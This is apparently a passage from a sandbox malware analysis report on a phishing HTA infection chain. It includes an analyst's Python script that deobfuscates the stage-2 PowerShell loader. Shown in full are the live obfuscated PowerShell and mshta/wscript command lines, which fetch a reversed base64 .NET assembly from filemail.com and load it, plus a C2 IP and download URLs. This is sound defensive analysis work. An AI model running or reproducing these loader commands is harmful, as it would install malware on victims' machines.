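    "dVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0E"
)

# Stage 2 (wscript.exe -> powershell.exe -> powershell.exe): the whole -command argument.
STAGE2_COMMAND = (
    r"(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'"
    r"+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '"
    r"+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'"
    r"+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'"
    r"+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'"
    r"+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'"
    r"+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'"
    r"+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })"
    r"[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);"
    r"hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('"
    r"+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, "
    r"DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,"
    r"DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),"
    r"[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
)

# Assumed %ComSpec% of the analysis VM; only the letters at the indexed positions matter.
COMSPEC = r"C:\Windows\system32\cmd.exe"


def decode_truncated_b64(b64):
    """Decode base64 that was cut off mid-stream by dropping the incomplete last group."""
    usable = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(usable).decode("utf-8", errors="replace")


def ps_value(expr):
    """Evaluate the PowerShell subset used as -replace operands: 'literal' or [Char]N+[Char]M."""
    expr = expr.strip()
    if expr.startswith("'") and expr.endswith("'"):
        return expr[1:-1]
    return "".join(chr(int(n)) for n in re.findall(r"\[Char\](\d+)", expr, re.I))


def deobfuscate_stage2(cmd):
    """Join the '+' fragments, then apply the -replace chain the script applies to itself."""
    m = re.match(r"\(\(((?:'[^']*'\+?)+)\)(.*)$", cmd, re.S)
    script = "".join(re.findall(r"'([^']*)'", m.group(1)))
    ops = re.findall(r"-(c?)replace\s*(\([^)]*\)|'[^']*'),\s*(\[Char\]\d+|'[^']*')", m.group(2), re.I)
    for case_sensitive, pattern, replacement in ops:
        rep = ps_value(replacement)
        flags = 0 if case_sensitive else re.I  # -creplace is case-sensitive, -replace is not
        script = re.sub(re.escape(ps_value(pattern)), lambda _: rep, script, flags=flags)
    return script


def comspec_alias(cmd):
    """Resolve the $env:ComSpec[i,j,k] -join '' trick to the cmdlet alias it spells."""
    idx = re.search(r"\$env:comspec\[([\d,]+)\]", cmd, re.I).group(1)
    return "".join(COMSPEC[int(i)] for i in idx.split(","))


def invoke_args(script):
    """Arguments handed to dnlib.IO.Home.VAI; the first is a URL written backwards."""
    body = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\);", script).group(1)
    return re.findall(r"'([^']*)'", body)


def extract_embedded_assembly(text):
    """What the decoded stage 2 does with its download: text between the markers,
    reversed, base64-decoded; the bytes go to [System.Reflection.Assembly]::Load()."""
    start = text.index("<<BASE64_START>>") + len("<<BASE64_START>>")
    end = text.index("<<BASE64_END>>", start)
    return base64.b64decode(text[start:end][::-1])


def constructed_payload(assembly_bytes):
    """Constructed stand-in for the filemail download, in the layout the script expects."""
    return "noise<<BASE64_START>>" + base64.b64encode(assembly_bytes).decode()[::-1] + "<<BASE64_END>>noise"


if __name__ == "__main__":
    print(decode_truncated_b64(STAGE1_B64_PREFIX))
    stage2 = deobfuscate_stage2(STAGE2_COMMAND)
    print(stage2)
    print("piped to:", comspec_alias(STAGE2_COMMAND))
    print("first VAI argument, reversed:", invoke_args(stage2)[0][::-1])
```

Reading the first VAI argument backwards gives http://23.95.128.215/226/VRCCCTR.txt, the same host and directory as the .tIF request recorded under Networking; the fifth argument, aspnet_compiler, is passed as a plain string and what the loaded assembly does with it is not visible in this report. The MSIE/Trident User-Agent on that .tIF request is what urlmon's URLDownloadToFile sends, which fits the stage-1 P/Invoke declaration.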

          Data Obfuscation

          barindex
          Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", ProcessId: 2188, ProcessName: csc.exe
          Timestamp: 2024-11-28T07:18:04.397158+0100, SID: 2858795, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 192.168.2.4, Source Port: 49730, Destination IP: 23.95.128.215, Destination Port: 80, Protocol: TCP


          AV Detection

          barindex
          Source: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIF, Avira URL Cloud: Label: malware
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta, ReversingLabs: Detection: 21%
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta, Virustotal: Detection: 29%
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability

          Phishing

          barindex
          Source: Yara match, File source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta, type: SAMPLE
          Source: unknown, HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1703698894.000000000755E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.pdb source: powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.pdbJ source: powershell.exe, 00000009.00000002.1816997416.0000000003488000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRgx source: powershell.exe, 00000003.00000002.1705324938.000000000847D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B50000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mshta.exe, File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d
          Source: C:\Windows\SysWOW64\mshta.exe, File opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
          Source: C:\Windows\SysWOW64\mshta.exe, File opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
          Source: C:\Windows\SysWOW64\mshta.exe, File opened: C:\Windows\SysWOW64\sppc.dll
          Source: C:\Windows\SysWOW64\mshta.exe, File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dll
          Source: C:\Windows\SysWOW64\mshta.exe, File opened: C:\Windows\SysWOW64\dxcore.dll

          Software Vulnerabilities

          barindex
          Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Source: Network traffic, Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 23.95.128.215:80
          Source: global traffic, HTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1 | Host: 3105.filemail.com | Connection: Keep-Alive
          Source: Joe Sandbox View, IP Address: 193.30.119.205
          Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
          Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global traffic, HTTP traffic detected: GET /226/seethepossiblethingsforentiretimetogivemebest.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 23.95.128.215 | Connection: Keep-Alive
          Source: unknown, TCP traffic detected without corresponding DNS query: 23.95.128.215 (this entry is repeated 50 times in the report)
          Source: global traffic, DNS traffic detected: DNS query: 3105.filemail.com
          Source: powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://23.95.128.215/226/seethep
          Source: powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIF
          Source: powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFPb
          Source: powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFlb;
          Source: powershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://3105.filemail.com
          Source: powershell.exe, 00000009.00000002.1841164664.0000000007BAF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.m
          Source: powershell.exe, 00000001.00000002.1828783287.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820146724.00000000072E1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://go.micros
          Source: powershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ip.3105.filemail.com
          Source: powershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000009.00000002.1816997416.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://3105.file
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://3105.filemail.com
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
          Source: powershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1811106062.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005AD4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
          Source: powershell.exe, 00000007.00000002.1856532641.0000000007270000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://go.microsoft.cH
          Source: powershell.exe, 00000001.00000002.1820146724.000000000731C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
          Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\mshta.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
          Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2005
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2402
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2005Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2402Jump to behavior
          Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engine | Classification label: mal100.phis.expl.evad.winHTA@17/19@1/2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seethepossiblethingsforentiretimetogivemebest[1].tiff
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5e4h1pl.1ss.ps1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
          Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta | ReversingLabs: Detection: 21%
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta | Virustotal: Detection: 29%
          Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta"
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
